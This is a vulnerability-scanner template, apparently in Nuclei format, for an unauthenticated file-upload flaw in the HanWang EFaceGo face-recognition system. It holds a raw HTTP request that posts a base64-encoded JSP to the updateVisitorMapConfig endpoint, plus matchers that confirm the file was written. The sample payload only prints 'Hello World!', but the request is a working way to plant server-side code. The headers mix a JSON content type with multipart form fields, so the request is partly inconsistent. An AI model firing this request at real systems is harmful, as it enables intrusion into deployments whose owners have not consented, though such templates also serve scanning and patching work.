id: HanWangEFaceGo-updateVisitorMapConfig-WriteToRCE

info:
  name: HanWangEFaceGo-updateVisitorMapConfig-WriteToRCE
  author: iSee857
  severity: critical
  description: HanWangEFaceGo-updateVisitorMapConfig-WriteToRCE
  reference:
    - https://example.com/vuln-details
  tags: file-upload,jsp,rce

http:
  - raw:
      - |
        POST /manage/visitorMapConfig/updateVisitorMapConfig.do?recoToken=SGUsqvF7cVS HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
        Content-Type: application/json
        Accept-Encoding: gzip, deflate

        ------WebKitFormBoundaryTxlvAiDA82bSOF0h
        Content-Disposition: form-data; name="file"; filename="123.jsp"
        Content-Type: image/jpeg

        {"id": 1,"mapName": "test","fileType": "jsp","updatedPhoto": "PCUgb3V0LnByaW50KCJIZWxsbyBXb3JsZCEiKTsgJT4="}

    attack: batteringram
    redirects: true
    max-redirects: 3
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - ".jsp"
          - "updatedPhotoPath"
          - "更新成功 "
        condition: and
        part: body